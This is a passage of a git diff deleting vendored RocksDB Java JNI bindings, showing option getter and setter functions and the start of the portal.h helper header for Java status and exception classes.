-void Java_org_rocksdb_DBOptions_setDumpMallocStats(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jdump_malloc_stats) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->dump_malloc_stats = static_cast<bool>(jdump_malloc_stats);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    dumpMallocStats
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_dumpMallocStats(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jboolean>(opt->dump_malloc_stats);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setAvoidFlushDuringRecovery
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setAvoidFlushDuringRecovery(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean javoid_flush_during_recovery) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->avoid_flush_during_recovery = static_cast<bool>(javoid_flush_during_recovery);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    avoidFlushDuringRecovery
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_avoidFlushDuringRecovery(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jboolean>(opt->avoid_flush_during_recovery);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    setAvoidFlushDuringShutdown
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_DBOptions_setAvoidFlushDuringShutdown(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean javoid_flush_during_shutdown) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  opt->avoid_flush_during_shutdown = static_cast<bool>(javoid_flush_during_shutdown);
-}
-
-/*
- * Class:     org_rocksdb_DBOptions
- * Method:    avoidFlushDuringShutdown
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_DBOptions_avoidFlushDuringShutdown(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jhandle);
-  return static_cast<jboolean>(opt->avoid_flush_during_shutdown);
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::WriteOptions
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    newWriteOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_WriteOptions_newWriteOptions(
-    JNIEnv* env, jclass jcls) {
-  auto* op = new rocksdb::WriteOptions();
-  return reinterpret_cast<jlong>(op);
-}
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    disposeInternal
- * Signature: ()V
- */
-void Java_org_rocksdb_WriteOptions_disposeInternal(
-    JNIEnv* env, jobject jwrite_options, jlong jhandle) {
-  auto* write_options = reinterpret_cast<rocksdb::WriteOptions*>(jhandle);
-  assert(write_options != nullptr);
-  delete write_options;
-}
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    setSync
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_WriteOptions_setSync(
-  JNIEnv* env, jobject jwrite_options, jlong jhandle, jboolean jflag) {
-  reinterpret_cast<rocksdb::WriteOptions*>(jhandle)->sync = jflag;
-}
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    sync
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_WriteOptions_sync(
-    JNIEnv* env, jobject jwrite_options, jlong jhandle) {
-  return reinterpret_cast<rocksdb::WriteOptions*>(jhandle)->sync;
-}
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    setDisableWAL
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_WriteOptions_setDisableWAL(
-    JNIEnv* env, jobject jwrite_options, jlong jhandle, jboolean jflag) {
-  reinterpret_cast<rocksdb::WriteOptions*>(jhandle)->disableWAL = jflag;
-}
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    disableWAL
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_WriteOptions_disableWAL(
-    JNIEnv* env, jobject jwrite_options, jlong jhandle) {
-  return reinterpret_cast<rocksdb::WriteOptions*>(jhandle)->disableWAL;
-}
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    setIgnoreMissingColumnFamilies
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_WriteOptions_setIgnoreMissingColumnFamilies(
-    JNIEnv* env, jobject jwrite_options, jlong jhandle,
-    jboolean jignore_missing_column_families) {
-  reinterpret_cast<rocksdb::WriteOptions*>(jhandle)->
-      ignore_missing_column_families =
-          static_cast<bool>(jignore_missing_column_families);
-}
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    ignoreMissingColumnFamilies
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_WriteOptions_ignoreMissingColumnFamilies(
-    JNIEnv* env, jobject jwrite_options, jlong jhandle) {
-  return reinterpret_cast<rocksdb::WriteOptions*>(jhandle)->
-      ignore_missing_column_families;
-}
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    setNoSlowdown
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_WriteOptions_setNoSlowdown(
-    JNIEnv* env, jobject jwrite_options, jlong jhandle, jboolean jno_slowdown) {
-  reinterpret_cast<rocksdb::WriteOptions*>(jhandle)->no_slowdown =
-      static_cast<bool>(jno_slowdown);
-}
-
-/*
- * Class:     org_rocksdb_WriteOptions
- * Method:    noSlowdown
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_WriteOptions_noSlowdown(
-    JNIEnv* env, jobject jwrite_options, jlong jhandle) {
-  return reinterpret_cast<rocksdb::WriteOptions*>(jhandle)->no_slowdown;
-}
-
-/////////////////////////////////////////////////////////////////////
-// rocksdb::ReadOptions
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    newReadOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_ReadOptions_newReadOptions(
-    JNIEnv* env, jclass jcls) {
-  auto* read_options = new rocksdb::ReadOptions();
-  return reinterpret_cast<jlong>(read_options);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_ReadOptions_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* read_options = reinterpret_cast<rocksdb::ReadOptions*>(jhandle);
-  assert(read_options != nullptr);
-  delete read_options;
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setVerifyChecksums
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ReadOptions_setVerifyChecksums(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jverify_checksums) {
-  reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->verify_checksums =
-      static_cast<bool>(jverify_checksums);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    verifyChecksums
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ReadOptions_verifyChecksums(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ReadOptions*>(
-      jhandle)->verify_checksums;
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setFillCache
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ReadOptions_setFillCache(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jfill_cache) {
-  reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->fill_cache =
-      static_cast<bool>(jfill_cache);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    fillCache
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ReadOptions_fillCache(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->fill_cache;
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setTailing
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ReadOptions_setTailing(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jtailing) {
-  reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->tailing =
-      static_cast<bool>(jtailing);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    tailing
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ReadOptions_tailing(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->tailing;
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    managed
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ReadOptions_managed(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->managed;
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setManaged
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ReadOptions_setManaged(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jmanaged) {
-  reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->managed =
-      static_cast<bool>(jmanaged);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    totalOrderSeek
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ReadOptions_totalOrderSeek(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->total_order_seek;
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setTotalOrderSeek
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ReadOptions_setTotalOrderSeek(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jtotal_order_seek) {
-  reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->total_order_seek =
-      static_cast<bool>(jtotal_order_seek);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    prefixSameAsStart
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ReadOptions_prefixSameAsStart(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->prefix_same_as_start;
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setPrefixSameAsStart
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ReadOptions_setPrefixSameAsStart(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jprefix_same_as_start) {
-  reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->prefix_same_as_start =
-      static_cast<bool>(jprefix_same_as_start);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    pinData
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ReadOptions_pinData(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->pin_data;
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setPinData
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ReadOptions_setPinData(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jpin_data) {
-  reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->pin_data =
-      static_cast<bool>(jpin_data);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    backgroundPurgeOnIteratorCleanup
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ReadOptions_backgroundPurgeOnIteratorCleanup(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::ReadOptions*>(jhandle);
-  return static_cast<jboolean>(opt->background_purge_on_iterator_cleanup);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setBackgroundPurgeOnIteratorCleanup
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ReadOptions_setBackgroundPurgeOnIteratorCleanup(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jbackground_purge_on_iterator_cleanup) {
-  auto* opt = reinterpret_cast<rocksdb::ReadOptions*>(jhandle);
-  opt->background_purge_on_iterator_cleanup =
-      static_cast<bool>(jbackground_purge_on_iterator_cleanup);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    readaheadSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ReadOptions_readaheadSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::ReadOptions*>(jhandle);
-  return static_cast<jlong>(opt->readahead_size);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setReadaheadSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ReadOptions_setReadaheadSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jreadahead_size) {
-  auto* opt = reinterpret_cast<rocksdb::ReadOptions*>(jhandle);
-  opt->readahead_size = static_cast<size_t>(jreadahead_size);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    ignoreRangeDeletions
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ReadOptions_ignoreRangeDeletions(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::ReadOptions*>(jhandle);
-  return static_cast<jboolean>(opt->ignore_range_deletions);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setIgnoreRangeDeletions
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ReadOptions_setIgnoreRangeDeletions(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jignore_range_deletions) {
-  auto* opt = reinterpret_cast<rocksdb::ReadOptions*>(jhandle);
-  opt->ignore_range_deletions = static_cast<bool>(jignore_range_deletions);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setSnapshot
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ReadOptions_setSnapshot(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jsnapshot) {
-  reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->snapshot =
-      reinterpret_cast<rocksdb::Snapshot*>(jsnapshot);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    snapshot
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ReadOptions_snapshot(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto& snapshot =
-      reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->snapshot;
-  return reinterpret_cast<jlong>(snapshot);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    readTier
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_ReadOptions_readTier(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return static_cast<jbyte>(
-      reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->read_tier);
-}
-
-/*
- * Class:     org_rocksdb_ReadOptions
- * Method:    setReadTier
- * Signature: (JB)V
- */
-void Java_org_rocksdb_ReadOptions_setReadTier(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jread_tier) {
-  reinterpret_cast<rocksdb::ReadOptions*>(jhandle)->read_tier =
-      static_cast<rocksdb::ReadTier>(jread_tier);
-}
-
-/////////////////////////////////////////////////////////////////////
-// rocksdb::ComparatorOptions
-
-/*
- * Class:     org_rocksdb_ComparatorOptions
- * Method:    newComparatorOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_ComparatorOptions_newComparatorOptions(
-    JNIEnv* env, jclass jcls) {
-  auto* comparator_opt = new rocksdb::ComparatorJniCallbackOptions();
-  return reinterpret_cast<jlong>(comparator_opt);
-}
-
-/*
- * Class:     org_rocksdb_ComparatorOptions
- * Method:    useAdaptiveMutex
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ComparatorOptions_useAdaptiveMutex(
-    JNIEnv * env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ComparatorJniCallbackOptions*>(jhandle)
-    ->use_adaptive_mutex;
-}
-
-/*
- * Class:     org_rocksdb_ComparatorOptions
- * Method:    setUseAdaptiveMutex
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ComparatorOptions_setUseAdaptiveMutex(
-    JNIEnv * env, jobject jobj, jlong jhandle, jboolean juse_adaptive_mutex) {
-  reinterpret_cast<rocksdb::ComparatorJniCallbackOptions*>(jhandle)
-    ->use_adaptive_mutex = static_cast<bool>(juse_adaptive_mutex);
-}
-
-/*
- * Class:     org_rocksdb_ComparatorOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_ComparatorOptions_disposeInternal(
-    JNIEnv * env, jobject jobj, jlong jhandle) {
-  auto* comparator_opt =
-      reinterpret_cast<rocksdb::ComparatorJniCallbackOptions*>(jhandle);
-  assert(comparator_opt != nullptr);
-  delete comparator_opt;
-}
-
-/////////////////////////////////////////////////////////////////////
-// rocksdb::FlushOptions
-
-/*
- * Class:     org_rocksdb_FlushOptions
- * Method:    newFlushOptions
- * Signature: ()J
- */
-jlong Java_org_rocksdb_FlushOptions_newFlushOptions(
-    JNIEnv* env, jclass jcls) {
-  auto* flush_opt = new rocksdb::FlushOptions();
-  return reinterpret_cast<jlong>(flush_opt);
-}
-
-/*
- * Class:     org_rocksdb_FlushOptions
- * Method:    setWaitForFlush
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_FlushOptions_setWaitForFlush(
-    JNIEnv * env, jobject jobj, jlong jhandle, jboolean jwait) {
-  reinterpret_cast<rocksdb::FlushOptions*>(jhandle)
-    ->wait = static_cast<bool>(jwait);
-}
-
-/*
- * Class:     org_rocksdb_FlushOptions
- * Method:    waitForFlush
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_FlushOptions_waitForFlush(
-    JNIEnv * env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::FlushOptions*>(jhandle)
-    ->wait;
-}
-
-/*
- * Class:     org_rocksdb_FlushOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_FlushOptions_disposeInternal(
-    JNIEnv * env, jobject jobj, jlong jhandle) {
-  auto* flush_opt = reinterpret_cast<rocksdb::FlushOptions*>(jhandle);
-  assert(flush_opt != nullptr);
-  delete flush_opt;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/portal.h b/thirdparty/rocksdb/java/rocksjni/portal.h
deleted file mode 100644
index ed671ce..0000000
--- a/thirdparty/rocksdb/java/rocksjni/portal.h
+++ /dev/null
@@ -1,3341 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-// This file is designed for caching those frequently used IDs and provide
-// efficient portal (i.e, a set of static functions) to access java code
-// from c++.
-
-#ifndef JAVA_ROCKSJNI_PORTAL_H_
-#define JAVA_ROCKSJNI_PORTAL_H_
-
-#include <jni.h>
-#include <functional>
-#include <iostream>
-#include <limits>
-#include <string>
-#include <vector>
-
-#include "rocksdb/db.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/status.h"
-#include "rocksdb/utilities/backupable_db.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "rocksjni/comparatorjnicallback.h"
-#include "rocksjni/loggerjnicallback.h"
-#include "rocksjni/writebatchhandlerjnicallback.h"
-
-// Remove macro on windows
-#ifdef DELETE
-#undef DELETE
-#endif
-
-namespace rocksdb {
-
-// Detect if jlong overflows size_t
-inline Status check_if_jlong_fits_size_t(const jlong& jvalue) {
-  Status s = Status::OK();
-  if (static_cast<uint64_t>(jvalue) > std::numeric_limits<size_t>::max()) {
-    s = Status::InvalidArgument(Slice("jlong overflows 32 bit value."));
-  }
-  return s;
-}
-
-class JavaClass {
- public:
-  /**
-   * Gets and initializes a Java Class
-   *
-   * @param env A pointer to the Java environment
-   * @param jclazz_name The fully qualified JNI name of the Java Class
-   *     e.g. "java/lang/String"
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env, const char* jclazz_name) {
-    jclass jclazz = env->FindClass(jclazz_name);
-    assert(jclazz != nullptr);
-    return jclazz;
-  }
-};
-
-// Native class template
-template<class PTR, class DERIVED> class RocksDBNativeClass : public JavaClass {
-};
-
-// Native class template for sub-classes of RocksMutableObject
-template<class PTR, class DERIVED> class NativeRocksMutableObject
-    : public RocksDBNativeClass<PTR, DERIVED> {
- public:
-
-  /**
-   * Gets the Java Method ID for the
-   * RocksMutableObject#setNativeHandle(long, boolean) method
-   *
-   * @param env A pointer to the Java environment
-   * @return The Java Method ID or nullptr the RocksMutableObject class cannot
-   *     be accessed, or if one of the NoSuchMethodError,
-   *     ExceptionInInitializerError or OutOfMemoryError exceptions is thrown
-   */
-  static jmethodID getSetNativeHandleMethod(JNIEnv* env) {
-    static jclass jclazz = DERIVED::getJClass(env);
-    if(jclazz == nullptr) {
-      return nullptr;
-    }
-
-    static jmethodID mid = env->GetMethodID(
-        jclazz, "setNativeHandle", "(JZ)V");
-    assert(mid != nullptr);
-    return mid;
-  }
-
-  /**
-   * Sets the C++ object pointer handle in the Java object
-   *
-   * @param env A pointer to the Java environment
-   * @param jobj The Java object on which to set the pointer handle
-   * @param ptr The C++ object pointer
-   * @param java_owns_handle JNI_TRUE if ownership of the C++ object is
-   *     managed by the Java object
-   *
-   * @return true if a Java exception is pending, false otherwise
-   */
-  static bool setHandle(JNIEnv* env, jobject jobj, PTR ptr,
-      jboolean java_owns_handle) {
-    assert(jobj != nullptr);
-    static jmethodID mid = getSetNativeHandleMethod(env);
-    if(mid == nullptr) {
-      return true;  // signal exception
-    }
-
-    env->CallVoidMethod(jobj, mid, reinterpret_cast<jlong>(ptr), java_owns_handle);
-    if(env->ExceptionCheck()) {
-      return true;  // signal exception
-    }
-
-    return false;
-  }
-};
-
-// Java Exception template
-template<class DERIVED> class JavaException : public JavaClass {
- public:
-  /**
-   * Create and throw a java exception with the provided message
-   *
-   * @param env A pointer to the Java environment
-   * @param msg The message for the exception
-   *
-   * @return true if an exception was thrown, false otherwise
-   */
-  static bool ThrowNew(JNIEnv* env, const std::string& msg) {
-    jclass jclazz = DERIVED::getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      std::cerr << "JavaException::ThrowNew - Error: unexpected exception!" << std::endl;
-      return env->ExceptionCheck();
-    }
-
-    const jint rs = env->ThrowNew(jclazz, msg.c_str());
-    if(rs != JNI_OK) {
-      // exception could not be thrown
-      std::cerr << "JavaException::ThrowNew - Fatal: could not throw exception!" << std::endl;
-      return env->ExceptionCheck();
-    }
-
-    return true;
-  }
-};
-
-// The portal class for org.rocksdb.RocksDB
-class RocksDBJni : public RocksDBNativeClass<rocksdb::DB*, RocksDBJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.RocksDB
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/RocksDB");
-  }
-};
-
-// The portal class for org.rocksdb.Status
-class StatusJni : public RocksDBNativeClass<rocksdb::Status*, StatusJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.Status
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return RocksDBNativeClass::getJClass(env, "org/rocksdb/Status");
-  }
-
-  /**
-   * Create a new Java org.rocksdb.Status object with the same properties as
-   * the provided C++ rocksdb::Status object
-   *
-   * @param env A pointer to the Java environment
-   * @param status The rocksdb::Status object
-   *
-   * @return A reference to a Java org.rocksdb.Status object, or nullptr
-   *     if an an exception occurs
-   */
-  static jobject construct(JNIEnv* env, const Status& status) {
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      return nullptr;
-    }
-
-    jmethodID mid =
-        env->GetMethodID(jclazz, "<init>", "(BBLjava/lang/String;)V");
-    if(mid == nullptr) {
-      // exception thrown: NoSuchMethodException or OutOfMemoryError
-      return nullptr;
-    }
-
-    // convert the Status state for Java
-    jstring jstate = nullptr;
-    if (status.getState() != nullptr) {
-      const char* const state = status.getState();
-      jstate = env->NewStringUTF(state);
-      if(env->ExceptionCheck()) {
-        if(jstate != nullptr) {
-          env->DeleteLocalRef(jstate);
-        }
-        return nullptr;
-      }
-    }
-
-    jobject jstatus =
-        env->NewObject(jclazz, mid, toJavaStatusCode(status.code()),
-            toJavaStatusSubCode(status.subcode()), jstate);
-    if(env->ExceptionCheck()) {
-      // exception occurred
-      if(jstate != nullptr) {
-        env->DeleteLocalRef(jstate);
-      }
-      return nullptr;
-    }
-
-    if(jstate != nullptr) {
-      env->DeleteLocalRef(jstate);
-    }
-
-    return jstatus;
-  }
-
-  // Returns the equivalent org.rocksdb.Status.Code for the provided
-  // C++ rocksdb::Status::Code enum
-  static jbyte toJavaStatusCode(const rocksdb::Status::Code& code) {
-    switch (code) {
-      case rocksdb::Status::Code::kOk:
-        return 0x0;
-      case rocksdb::Status::Code::kNotFound:
-        return 0x1;
-      case rocksdb::Status::Code::kCorruption:
-        return 0x2;
-      case rocksdb::Status::Code::kNotSupported:
-        return 0x3;
-      case rocksdb::Status::Code::kInvalidArgument:
-        return 0x4;
-      case rocksdb::Status::Code::kIOError:
-        return 0x5;
-      case rocksdb::Status::Code::kMergeInProgress:
-        return 0x6;
-      case rocksdb::Status::Code::kIncomplete:
-        return 0x7;
-      case rocksdb::Status::Code::kShutdownInProgress:
-        return 0x8;
-      case rocksdb::Status::Code::kTimedOut:
-        return 0x9;
-      case rocksdb::Status::Code::kAborted:
-        return 0xA;
-      case rocksdb::Status::Code::kBusy:
-        return 0xB;
-      case rocksdb::Status::Code::kExpired:
-        return 0xC;
-      case rocksdb::Status::Code::kTryAgain:
-        return 0xD;
-      default:
-        return 0x7F;  // undefined
-    }
-  }
-
-  // Returns the equivalent org.rocksdb.Status.SubCode for the provided
-  // C++ rocksdb::Status::SubCode enum
-  static jbyte toJavaStatusSubCode(const rocksdb::Status::SubCode& subCode) {
-    switch (subCode) {
-      case rocksdb::Status::SubCode::kNone:
-        return 0x0;
-      case rocksdb::Status::SubCode::kMutexTimeout:
-        return 0x1;
-      case rocksdb::Status::SubCode::kLockTimeout:
-        return 0x2;
-      case rocksdb::Status::SubCode::kLockLimit:
-        return 0x3;
-      case rocksdb::Status::SubCode::kMaxSubCode:
-        return 0x7E;
-      default:
-        return 0x7F;  // undefined
-    }
-  }
-};
-
-// The portal class for org.rocksdb.RocksDBException
-class RocksDBExceptionJni :
-    public JavaException<RocksDBExceptionJni> {
- public:
-  /**
-   * Get the Java Class org.rocksdb.RocksDBException
-   *
-   * @param env A pointer to the Java environment
-   *
-   * @return The Java Class or nullptr if one of the
-   *     ClassFormatError, ClassCircularityError, NoClassDefFoundError,
-   *     OutOfMemoryError or ExceptionInInitializerError exceptions is thrown
-   */
-  static jclass getJClass(JNIEnv* env) {
-    return JavaException::getJClass(env, "org/rocksdb/RocksDBException");
-  }
-
-  /**
-   * Create and throw a Java RocksDBException with the provided message
-   *
-   * @param env A pointer to the Java environment
-   * @param msg The message for the exception
-   *
-   * @return true if an exception was thrown, false otherwise
-   */
-  static bool ThrowNew(JNIEnv* env, const std::string& msg) {
-    return JavaException::ThrowNew(env, msg);
-  }
-
-  /**
-   * Create and throw a Java RocksDBException with the provided status
-   *
-   * If s.ok() == true, then this function will not throw any exception.
-   *
-   * @param env A pointer to the Java environment
-   * @param s The status for the exception
-   *
-   * @return true if an exception was thrown, false otherwise
-   */
-  static bool ThrowNew(JNIEnv* env, const Status& s) {
-    assert(!s.ok());
-    if (s.ok()) {
-      return false;
-    }
-
-    // get the RocksDBException class
-    jclass jclazz = getJClass(env);
-    if(jclazz == nullptr) {
-      // exception occurred accessing class
-      std::cerr << "RocksDBExceptionJni::ThrowNew/class - Error: unexpected exception!" << std::endl;
-      return env->ExceptionCheck();
-    }
-
-    // get the constructor of org.rocksdb.RocksDBException
-    jmethodID mid =
-        env->GetMethodID(jclazz, "<init>", "(Lorg/rocksdb/Status;)V");
-    if(mid == nullptr) {
-      // exception thrown: NoSuchMethodException or OutOfMemoryError
-      std::cerr << "RocksDBExceptionJni::ThrowNew/cstr - Error: unexpected exception!" << std::endl;
-      return env->ExceptionCheck();
-    }
-
-    // get the Java status object
-    jobject jstatus = StatusJni::construct(env, s);
-    if(jstatus == nullptr) {
-      // exception occcurred
-      std::cerr << "RocksDBExceptionJni::ThrowNew/StatusJni - Error: unexpected exception!" << std::endl;
-      return env->ExceptionCheck();
-    }
-
-    // construct the RocksDBException
-    jthrowable rocksdb_exception = reinterpret_cast<jthrowable>(env->NewObject(jclazz, mid, jstatus));
-    if(env->ExceptionCheck()) {
-      if(jstatus != nullptr) {
-        env->DeleteLocalRef(jstatus);
-      }
-      if(rocksdb_exception != nullptr) {
-        env->DeleteLocalRef(rocksdb_exception);
-      }
-      std::cerr << "RocksDBExceptionJni::ThrowNew/NewObject - Error: unexpected exception!" << std::endl;
-      return true;
-    }
-
-    // throw the RocksDBException
-    const jint rs = env->Throw(rocksdb_exception);
